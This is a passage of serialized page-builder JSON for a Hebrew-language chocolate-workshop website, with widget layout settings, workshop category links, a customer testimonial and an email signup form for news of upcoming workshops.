\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"25\",\"bottom\":\"50\",\"left\":\"25\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"20\",\"bottom\":\"60\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"702ee38f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"60600fc4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":32,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-couple.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"},\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%96%D7%95%D7%92%D7%99%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"f9b0ce7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"6945b5b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":31,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-woman.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"},\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%9E%D7%A1%D7%99%D7%91%D7%AA-%D7%A8%D7%95%D7%95%D7%A7%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"fa7a00f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"afa7d0f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":28,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-company.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"},\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%97%D7%91%D7%A8%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"4a4b992\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"c498248\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":30,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-kids.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"},\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%99%D7%9C%D7%93%D7%99%D7%9D\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5684ff50\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"id\":91,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/BG.jpg\"},\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#190606\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.75},\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"115\",\"bottom\":\"50\",\"left\":\"115\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"40\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"74663cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"125f3fc\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05de\\u05d4 \\u05d4\\u05e9\\u05d1\\u05e2\\u05d9\\u05dd \\u05d4\\u05de\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05e9\\u05dc\\u05e0\\u05d5 \\u05d0\\u05d5\\u05de\\u05e8\\u05d9\\u05dd\",\"align\":\"center\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":53},\"typography_font_weight\":\"400\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"43\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"40\"},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6410b809\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":32,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-couple.png\"},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"0\",\"isLinked\":false},\"caption\":\"\\u05e0\\u05ea\\u05d9 \\u05d5\\u05d2\\u05d1\\u05e8\\u05d9\\u05d0\\u05dc\\u05d4 \\u05de\\u05e8\\u05d0\\u05e9\\u05d5\\u05df \\u05dc\\u05e6\\u05d9\\u05d5\\u05df\",\"text_color\":\"#cccccc\",\"caption_typography_typography\":\"custom\",\"caption_typography_font_size\":{\"unit\":\"px\",\"size\":13},\"caption_source\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6c4e5757\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\\"\\u05ea\\u05de\\u05d9\\u05d3 \\u05d0\\u05d4\\u05d1\\u05ea\\u05d9 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d0\\u05e3 \\u05e4\\u05e2\\u05dd \\u05dc\\u05d0 \\u05d7\\u05e9\\u05d1\\u05ea\\u05d9 \\u05e9\\u05d0\\u05e0\\u05d9 \\u05d0\\u05ea\\u05e8\\u05d2\\u05e9 \\u05db\\u05dc \\u05db\\u05da \\u05de\\u05d9\\u05d5\\u05dd \\u05e9\\u05dc\\u05dd \\u05e9\\u05dc \\u05de\\u05ea\\u05d5\\u05e7. \\u05ea\\u05d5\\u05d3\\u05d4 \\u05e8\\u05d1\\u05d4 \\u05dc\\u05e6\\u05d5\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U \\u05e9\\u05e2\\u05d6\\u05e8 \\u05dc\\u05d9 \\u05dc\\u05de\\u05e6\\u05d5\\u05d0 \\u05d0\\u05ea \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05de\\u05ea!\\\"\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":27},\"typography_font_weight\":\"400\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"17\",\"bottom\":\"0\",\"left\":\"17\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"25\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"25\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"typography_font_style\":\"italic\",\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c25e365\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u05d2\\u05dd \\u05d0\\u05e0\\u05d9 \\u05e8\\u05d5\\u05e6\\u05d4 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4!\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26},\"typography_font_weight\":\"normal\",\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"3\"},\"button_text_color\":\"#40272c\",\"background_color\":\"#edd0a8\",\"border_width\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"50\",\"bottom\":\"20\",\"left\":\"50\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"15\"},\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#5c0011\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A6%D7%A8%D7%95-%D7%A7%D7%A9%D7%A8\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"43f8ef8f\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"39181ab4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"10694622\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"5212b57b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"2b9dc682\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"50c468d5\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%96%D7%95%D7%92%D7%99%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%9E%D7%A1%D7%99%D7%91%D7%AA-%D7%A8%D7%95%D7%95%D7%A7%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"9dc0267\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%97%D7%91%D7%A8%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"3003b83\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%99%D7%9C%D7%93%D7%99%D7%9D\\/\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"45bcecca\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"37f8a4fc\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"285e10d7\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"24484b98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"33814887\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"48098d8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f32a997\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"\\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4?\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea 